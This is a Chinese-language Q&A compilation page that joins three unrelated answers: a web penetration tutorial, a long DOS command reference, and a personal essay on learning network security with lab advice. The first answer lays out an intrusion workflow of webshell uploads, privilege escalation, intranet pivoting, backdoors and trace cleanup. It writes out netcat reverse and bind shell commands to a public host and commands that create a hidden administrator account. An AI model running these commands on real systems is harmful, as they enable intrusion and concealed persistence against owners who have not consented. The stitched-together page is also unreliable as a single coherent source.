❶ web滲透是什麼
Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標網站的源碼等信息的情況下對其滲透,相當於代碼分析審計。而黑盒測試則是在對該網站系統信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。
Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權,內網滲透,留後門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然後注入得到後台管理員賬號密碼,登錄後台,上傳小馬,再通過小馬上傳大馬,提權,內網轉發,進行內網滲透,掃描內網c段存活主機及開放埠,看其主機有無可利用漏洞(nessus)埠(nmap)對應服務及可能存在的漏洞,對其利用(msf)拿下內網,留下後門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到資料庫並可執行cmd命令,可繼續上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術可以不高,思路一定得騷。
信息收集
信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。
DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網站負責人及其信息(whois查詢)
整站信息:伺服器操作系統、伺服器類型及版本(Apache/Nginx/Tomcat/IIS)、資料庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;
網站常見搭配為:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目錄信息(御劍,dirbust)
開放埠信息(nmp)
漏洞掃描
利用AWVS,AppScan,OWASP-ZAP,等可對網站進行網站漏洞的初步掃描,看其是否有可利用漏洞。
常見漏洞:
SQL注入
XSS跨站腳本
CSRF跨站請求偽造
XXE(XML外部實體注入)漏洞
SSRF(服務端請求偽造)漏洞
文件包含漏洞
文件上傳漏洞
文件解析漏洞
遠程代碼執行漏洞
CORS跨域資源共享漏洞
越權訪問漏洞
目錄遍歷漏洞和任意文件讀取/下載漏洞
漏洞利用
用工具也好什麼也好對相應漏洞進行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
後台密碼爆破(burp)
埠爆破(hydra)
提權
獲得shell之後我們許可權可能很低,因此要對自己提權,可以根據伺服器版本對應的exp進行提權,對於Windows系統也可看其補丁對應漏洞的exp進行提權
內網滲透
首先進行埠轉發可用nc
nc使用方法:
反向連接
在公網主機上進行監聽:
nc-lvp 4444
在內網主機上執行:
nc-e cmd.exe 公網主機ip4444
成功之後即可得到一個內網主機shell
正向連接
遠程主機上執行:
nc-l -p 4444 -t -e cmd.exe
本地主機上執行:
nc-vv 遠程主機ip4444
成功後,本地主機即可遠程主機的一個shell
然後就是對內網進行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進行掃描看是否有可用漏洞,可用msf進行利用,或者用nmap掃描存活主機及開放埠,可用hydra進行埠爆破或者用msf對埠對應漏洞得到shell拿下內網留後門
留後門
對於網站上傳一句話木馬,留下後門
對於windows用戶可用hideadmin創建一個超級隱藏賬戶
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現控製版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。
❷ 求所有CMD的指令
DOS命令集-回憶DOS命令集-回憶(一)MD——建立子目錄 1.功能:創建新的子目錄 2.類型:內部命令 3.格式:MD[盤符:][路徑名]〈子目錄名〉 4.使用說明: (1)「盤符」:指定要建立子目錄的磁碟驅動器字母,若省略,則為當前驅動器; (2)「路徑名」:要建立的子目錄的上級目錄名,若預設則建在當前目錄下。 例:(1)在C盤的根目錄下創建名為FOX的子目錄;(2)在FOX子目錄下再創建USER子目錄。 C:、>MD FOX (在當前驅動器C盤下創建子目錄FOX) C:、>MD FOX 、USER (在FOX 子目錄下再創建USER子目錄) (二)CD——改變當前目錄 1.功能:顯示當前目錄 2.類型:內部命令 3.格式:CD[盤符:][路徑名][子目錄名] 4.使用說明: (1)如果省略路徑和子目錄名則顯示當前目錄; (2)如採用「CD、」格式,則退回到根目錄; (3)如採用「CD.。」格式則退回到上一級目錄。 例:(1)進入到USER子目錄;(2)從USER子目錄退回到子目錄;(3)返回到根目錄。 C:、>CD FOX 、USER(進入FOX子目錄下的USER子目錄) C:、FOX、USER>CD.。 (退回上一級根目錄) C:、FOX>CD、 (返回到根目錄) C:、> (三)RD——刪除子目錄命令 1.功能:從指定的磁碟刪除了目錄。 2.類型:內部命令 3.格式:RD[盤符:][路徑名][子目錄名] 4.使用說明: (1)子目錄在刪除前必須是空的,也就是說需要先進入該子目錄,使用DEL(刪除文件的命令)將其子目錄下的文件刪空,然後再退回到上一級目錄,用RD命令刪除該了目錄本身; (2)不能刪除根目錄和當前目錄。 例:要求把C盤FOX子目錄下的USER子目錄刪除,操作如下: 第一步:先將USER子目錄下的文件刪空; C、>DEL C:、FOX、USER、*。* 第二步,刪除USER子目錄。 C、>RD C:、FOX、USER (四)DIR——顯示磁碟目錄命令 1.功能:顯示磁碟目錄的內容。 2.類型:內部命令 3.格式:DIR [盤符][路徑][/P][/W] 4. 使用說明:/P的使用;當欲查看的目錄太多,無法在一屏顯示完屏幕會一直往上卷,不容易看清,加上/P參數後,屏幕上會分面一次顯示23行的文件信息,然後暫停,並提示;Press any key to continue /W的使用:加上/W只顯示文件名,至於文件大小及建立的日期和時間則都省略。加上參數後,每行可以顯示五個文件名。 PATH——路徑設置命令 1.功能:設備可執行文件的搜索路徑,只對文件有效。 2.類型:內部命令 3.格式:PATH[盤符1]目錄[路徑名1]{[;盤符2:],〈目錄路徑名2〉…} 4.使用說明: (1)當運行一個可執行文件時,DOS會先在當前目錄中搜索該文件,若找到則運行之;若找不到該文件,則根據PATH命令所設置的路徑,順序逐條地到目錄中搜索該文件; (2)PATH命令中的路徑,若有兩條以上,各路徑之間以一個分號「;」隔開; (3)PATH命令有三種使用方法: PATH[盤符1:][路徑1][盤符2:][路徑2]…(設定可執行文件的搜索路徑) PATH:(取消所有路徑) PATH:(顯示目前所設的路徑) (六)TREE——顯示磁碟目錄結構命令 1.功能:顯示指定驅動器上所有目錄路徑和這些目錄下的所有文件名。 2.類型:外部命令 3.格式:TREE[盤符:][/F][》PRN] 4.使用說明: (1)使用/F參數時顯示所有目錄及目錄下的所有文件,省略時,只顯示目錄,不顯示目錄下的文件; (2)選用>PRN參數時,則把所列目錄及目錄中的文件名列印輸出。 (七)DELTREE——刪除整個目錄命令 1.功能:將整個目錄及其下屬子目錄和文件刪除。 2.類型:外部命令 3.格式:DELTREE[盤符:]〈路徑名〉 4.使用說明:該命令可以一步就將目錄及其下的所有文件、子目錄、更下層的子目錄一並刪除,而且不管文件的屬性為隱藏、系統或只讀,只要該文件位於刪除的目錄之下,DELTREE都一視同仁,照刪不誤。使用時務必小心!!! 五、磁碟操作類命令 (一)formAT——磁碟格式化命令 1.功能:對磁碟進行格式化,劃分磁軌和扇區;同時檢查出整個磁碟上有無帶缺陷的磁軌,對壞道加註標記;建立目錄區和文件分配表,使磁碟作好接收DOS的准備。 2.類型:外部命令 3.格式:formAT〈盤符:〉[/S][/4][/Q] 4.使用說明: (1)命令後的盤符不可預設,若對硬碟進行格式化,則會如下列提示:WARNING:ALL DATA ON NON ——REMOVABLE DISK DRIVE C:WILL BE LOST ! Proceed with format (Y/N)? (警告:所有數據在C盤上,將會丟失,確實要繼續格式化嗎?) (2)若是對軟盤進行格式化,則會如下提示:Insert mew diskette for drive A; and press ENTER when ready… (在A驅中插入新盤,准備好後按回車鍵)。 (3)選用[/S]參數,將把DOS系統文件IO.SYS 、MSDOS.SYS及COMMAND.COM復制到磁碟上,使該磁碟可以做為DOS啟動盤。若不選用/S參數,則格式化後的磙盤只能讀寫信息,而不能做為啟動盤; (4)選用[/4]參數,在1.2MB的高密度軟碟機中格式化360KB的低密度盤; (5)選用[/Q]參數,快速格式化,這個參數並不會重新劃分磁碟的磁軌貌岸然和扇區,只能將磁碟根目錄、文件分配表以及引導扇區清成空白,因此,格式化的速度較快。 (6)選用[/U]參數,表示無條件格式化,即破壞原來磁碟上所有數據。不加/U,則為安全格式化,這時先建立一個鏡象文件保存原來的FAT表和根目錄,必要時可用UNFORRMAT恢復原來的數據。 (二)UNformAT恢復格式化命令 1.功能:對進行過格式化誤操作丟失數據的磁碟進行恢復。 2.類型:外部命令 3.格式:UNformAT〈盤符〉[/L][/U][/P][/TEST] 4.使用說明:用於將被「非破壞性」格式化的磁碟恢復。根目錄下被刪除的文件或子目錄及磁碟的系統扇區(包括FAT、根目錄、BOOT扇區及硬碟分區表)受損時,也可以用UNformAT來搶救。 (1)選用/L參數列出找到的子目錄名稱、文件名稱、大孝日期等信息,但不會真的做formAT工作。 (2)選用/P參數將顯示於屏幕的報告(包含/L參數所產生的信息)同時也送到列印機。運行時屏幕會顯示:「Print out will be sent to LPT1」 (3)選用/TEST參數只做模擬試驗(TEST)不做真正的寫入動作。使用此參數屏幕會顯示:「Simulation only」 (4)選用/U參數不使用MIRROR映像文件的數據,直接根據磁碟現狀進行UNformAT。 (5)選用/PSRTN;修復硬碟分區表。 若在盤符之後加上/P、/L、/TEST之一,都相當於使用了/U參數,UNformAT會「假設」此時磁碟沒有MIRROR映像文件。 注意:UNformAT對於剛formAT的磁碟,可以完全恢復,但formAT後若做了其它數據的寫入,則UNformAT就不能完整的救回數據了。UNformAT並非是萬能的,由於使用UNformAT會重建FAT與根目錄,所以它也具有較高的危險性,操作不當可能會擴大損失,如果僅誤刪了幾個文件或子目錄,只需要利用UNDELETE就夠了。 三) CHKDSK——檢查磁碟當前狀態命令 1.功能:顯示磁碟狀態、內存狀態和指定路徑下指定文件的不連續數目。 2.類型:外部命令 3.格式:CHKDSK [盤符:][路徑][文件名][/F][/V] 4.使用說明: (1)選用[文件名]參數,則顯示該文件佔用磁碟的情況; (2)選[/F]參數,糾正在指定磁碟上發現的邏輯錯誤; (3)選用[/V]參數,顯示盤上的所有文件和路徑。 (四)DISKCOPY——整盤復制命令 1.功能:復制格式和內容完全相同的軟盤。 2.類型:外部命令 3.格式:DISKCOPY[盤符1:][盤符2:] 4.使用說明: (1)如果目標軟盤沒有格式化,則復制時系統自動選進行格式化。 (2)如果目標軟盤上原有文件,則復制後將全部丟失。 (3)如果是單驅動器復制,系統會提示適時更換源盤和目標盤,請操作時注意分清源盤和目標盤。 (五)LABEL——建立磁碟卷標命令 1.功能:建立、更改、刪除磁碟卷標。 2.類型:外部命令 3.格式:LABEL[盤符:][卷標名] 4.使用說明: (1)卷標名為要建立的卷標名,若預設此參數,則系統提示鍵入卷標名或詢問是否刪除原有的卷標名; (2)卷標名由1至11個字元組成。 (六)VOL——顯示磁碟卷標命令 1.功能:查看磁碟卷標號。 2.類型:內部命令 3.格式:VOL[盤符:] 4.使用說明:省略盤符,顯示當前驅動器卷標。 (七)SCANDISK——檢測、修復磁碟命令 1.功能:檢測磁碟的FAT表、目錄結構、文件系統等是否有問題,並可將檢測出的問題加以修復。 2.類型:外部命令 3.格式:SCANDISK[盤符1:]{[盤符2:]…}[/ALL] 4.使用說明: (1)CCANDISK適用於硬碟和軟盤,可以一次指定多個磁碟或選用[/ALL]參數指定所有的磁碟; (2)可自動檢測出磁碟中所發生的交*連接、丟失簇和目錄結構等邏輯上的錯誤,並加以修復。 (八)DEFRAG——重整磁碟命令 1.。功能:整理磁碟,消除磁碟碎塊。 2.類型:外部命令 3.格式:DEFRAG[盤符:][/F] 4.使用說明:選用/F參數,將文件中存在盤上的碎片消除,並調整磁碟文件的安排,確保文件之間毫無空隙。從而加快讀盤速度和節省磁碟空間。 (九)SYS——系統復制命令 1.功能:將當前驅動器上的DOS系統文件IO.SYS,MSDOS.SYS和COMMAND.COM 傳送到指定的驅動器上。 2.類型:外部命令 3.格式:SYS[盤符:] *使用說明:如果磁碟剩餘空間不足以存放系統文件,則提示:No roomfor on destination disk. 文件操作類命令 (一) COPY文件復制命令 1.功能:拷貝一個或多個文件到指定盤上。 2.類型:內部命令 3.格式:COPY [源盤][路徑]〈源文件名〉[目標盤][路徑][目標文件名] 4.使用說明: (1)COPY是文件對文件的方式復制數據,復制前目標盤必須已經格式化; (2)復制過程中,目標盤上相同文件名稱的舊文件會被源文件取代; (3)復制文件時,必須先確定目標般有足夠的空間,否則會出現;insufficient的錯誤信息,提示磁碟空間不夠; (4)文件名中允許使用通配舉「*」「?」,可同時復制多個文件; (5)COPY命令中源文件名必須指出,不可以省略。 (6)復制時,目標文件名可以與源文件名相同,稱作「同名拷貝」此時目標文件名可以省略; (7)復制時,目標文件名也可以與源文件名不相同,稱作「異名拷貝」,此時,目標文件名不能省略; (8)復制時,還可以將幾個文件合並為一個文件,稱為「合並拷貝」,格式如下:COPY;[源盤][路徑]〈源文件名1〉〈源文件名2〉…[目標盤][路徑]〈目標文件名〉; (9)利用COPY命令,還可以從鍵盤上輸入數據建立文件,格式如下:COPY CON [盤符:][路徑]〈文件名〉; (10)注意:COPY命令的使用格式,源文件名與目標文件名之間必須有空格! (二)XCOPY——目錄復制命令 1.功能:復制指定的目錄和目錄下的所有文件連同目錄結構。 2.類型:外部命令 3.格式:XCOPY [源盤:]〈源路徑名〉[目標盤符:][目標路徑名][/S][/V][/E] 4.使用說明: (1)XCOPY是COPY的擴展,可以把指定的目錄連文件和目錄結構一並拷貝,但不能拷貝隱藏文件和系統文件; (2)使用時源盤符、源目標路徑名、源文件名至少指定一個; (3)選用/S時對源目錄下及其子目錄下的所有文件進行COPY。除非指定/E參數,否則/S不會拷貝空目錄,若不指定/S參數,則XCOPY只拷貝源目錄本身的文件,而不涉及其下的子目錄; (4)選用/V參數時,對的拷貝的扇區都進行較驗,但速度會降低。 (三)TYPE——顯示文件內容命令 1.功能:顯示ASCII碼文件的內容。 2.類型:內部命令。 3.格式:TYPE[盤符:][路徑]〈文件名〉 4.使用說明: (1)顯示由ASCII碼組成的文本文件,對。EXE.COM等為擴展名的文件,其顯示的內容是無法閱讀的,沒有實際意義2; (2)該命令一次只可以顯示一個文件的內容,不能使用通配符; (3)如果文件有擴展名,則必須將擴展名寫上; (4)當文件較長,一屏顯示不下時,可以按以下格式顯示;TYPE[盤符:][路徑]〈文件名〉|MORE,MORE為分屏顯示命令,使用些參數後當滿屏時會暫停,按任意鍵會繼續顯示。 (5)若需將文件內容列印出來,可用如下格式: TYPE[盤符:][路徑]〈文件名〉,>PRN 此時,列印機應處於聯機狀態。
❸ 如何學好網路安全
經常看到一些網友在論壇發帖問該如何學習網路安全技術,說的直接一點就是想學習黑客攻防技術,最近有網友加我qq又談到這個問題,今天就整理一下我的一些看法,希望對大家能有所幫助。
從98年開始接觸網路安全技術到現在已經10多年了,那時候的個人電腦的系統基本都是win98,伺服器基本是winnt,上網都是通過貓撥號上網,記得上網一小時4.2元。攻擊方法基本就是遠程式控制制,遠程藍屏,暴力破解密碼,拒絕服務攻擊等,還沒有出現sql注入和社工,安全書籍中的文章大多數都是對一些軟體的使用方法做介紹,用的木馬基本就兩個,美國死牛之祭組織出的bo2000和國產的冰河。冰河我用了很長一段時間,直到現在看到7626這個數字還覺得親切,因為這是冰河被控制端開啟的埠,手工刪除冰河也很簡單,找到進程中的g_server.exe關閉刪除就可以了。還有個破解win98共享文件夾的軟體印象也比較深刻,圖標是個卡通公雞頭,破解速度很快,破解原理是系統密碼認證有問題,對密碼的識別不是整個字元串識別的,而是一個字元一個字元的識別,破解軟體就可以根據系統返回的yes、no進行嘗試。
網上不少人說要學網路安全一定要會c和c++語言,我覺得完全沒必要,不是說學了沒用,而是在初學階段用處不大,甚至枯燥的學習會扼殺你的興趣,等到技術達到了一定程度再學,會事半功倍,不少從事信息安全多年的專業人士都沒有寫過一行代碼,一樣被人稱為大牛。還有人說學網路安全英語一定要好,其實你只要能認識那些常用的計算機單詞就行了,當然你要考cissp除外。還有人說學網路安全一定要會unix和linux,我覺得windows就夠學的了,人的精力總是有限的,不可能把所有的領域都搞得很精通,與其樣樣通,樣樣松,何不做精,在某一領域有所專長。
忘記unicode漏洞是哪年被發現了,感覺很震撼,沒想到通過這種方式可以控制計算機,當時有這種漏洞的伺服器到處都是,原因很簡單,伺服器管理者對系統補丁的重要性認識不足,沒有及時安裝補丁。這種漏洞的利用方式簡單的講就是通過瀏覽器就可以對目標計算機執行cmd命令,用的最多的命令就是dir、、type,用dir瀏覽伺服器的文件目錄,看到感興趣的文件到虛擬目錄下,然後通過瀏覽器下載,看到文本文件用type閱讀。也可以通過tftp上傳文件。
還有輸入法漏洞,同樣的震撼,入侵者通過遠程桌面連接到目標計算機上,調出輸入法,通過輸入法的幫助功能,執行cmd命令,盡管是老漏洞,但同樣適用於目前的一些遠程接入程序,學網路安全必須做到舉一反三,條條大路通羅馬。
印象最深刻的遠程溢出漏洞是在05年,ms05039漏洞,溢出後,用nc可以直接連上某個溢出後開啟的埠,獲得系統的shell許可權,在互聯網上成功率很高,在區域網成功率基本是99%。
沒頭沒腦說這么多,又不能混稿費,就此打住,進入正題。初學者可以在計算機上安裝vm虛擬機,vm的功能很多,需要注意的就這么幾個:製作恢復快照,通過Ctrl+Alt釋放虛擬機中的滑鼠,安裝完vm後,接著安裝VMwareTools 其他就不做詳細介紹了。在虛擬機中安裝個win2003,安裝完成後,默認設置下是可以ping通本地機的,這樣一個小的網路環境就搭建好了,如果硬體允許,可以同時運行多個虛擬機,用虛擬系統進行攻防測試,不會影響到真實系統。至於都做哪些攻防測試,我覺得可以先做系統漏洞攻防,下載使用各種漏洞掃描器,進行全面掃描,根據存在的漏洞,用各種方法做入侵測試,還可以試試各種溢出攻擊,掌握各種常用的cmd命令。接下來可以開啟系統的iis服務,在虛擬目錄中放一個漏洞百出的整站系統做web漏洞攻防,sql注入、跨站、腳本入侵等,根據獲得的webshell進行提權測試。還可以在系統中安裝各種應用軟體,對應用軟體存在的漏洞進行攻防測試。喜歡看書的朋友還可以看看《黑客x檔案》、《黑客手冊》、《黑客防線》,網上有部分電子版,前兩本相對簡單寫,《黑客防線》系統底層的文章相對多些。等到各種攻防測試都做完了,可以看看一些網路基礎方面的書籍,你會發現之前苦澀難懂的理論知識理解起來不是那麼困難了。《TCP/IP
詳解》這本書不錯,卷一詳細描述協議棧,同樣的一本書,每個階段看,收獲是完全不一樣的。《欺騙的藝術》這本書也不錯,網上有電子版,看完後你會發現,社會工程學原來是門藝術。當你掌握的技術越多,就越覺得不懂的更多。
黑客工具有成千上萬個,這里給大家介紹幾款個人感覺不錯的。x-scan,國產漏洞掃描器,優點是穩定,可擴展性強,缺點是很久沒更新了,漏洞庫不夠新;Acunetix
Web Vulnerability
Scanner,簡寫wvs,是款web掃描器,優點是web漏洞掃描全面,缺點是運行速度太慢;ssport,小巧的埠掃描器,優點是掃描速度快,可以在運行中調節掃描速度,號稱無級變速,缺點是有漏掃情況,佔用網路資源很厲害,運行後,基本不用上網了,甚至拖垮你的區域網。不少人用s掃描器,ssport的埠掃描速度不如s掃描器,但整體來說不比s掃描器差。cain,很不錯的嗅探工具,功能太多了,操作稍微有點復雜,用了cain你會發現,網路中到處都是明文密碼。
如果你的時間和精力充足,又想學學編程,可以考慮學學delphi,上手快,不是有這么一句話嗎:聰明的程序員用delphi,學編程對全面了解操作系統有一定的幫助。
當你學會了攻,也就明白怎麼防了,防比攻更難,攻是單點突破,防是系統工程。網上不少人在收徒弟,這其中不少人是騙子,前不久看過一個所謂的黑客教學視頻,製作者通過一個不帶任何參數的ping命令+web掃描,只是web掃描,就擊垮了一個SF伺服器,看完後我也被他擊垮了。最好的老師永遠是你自己,只要有興趣,多動手實踐,多思考,一定會有所收獲。路在何方?路永遠在你腳下。最後還要說一句,不要去黑別人,因為中國有句老話:善有善報,惡有惡報。更不要以為做了幾次跳板別人就找不到你了。
轉載僅供參考,版權屬於原作者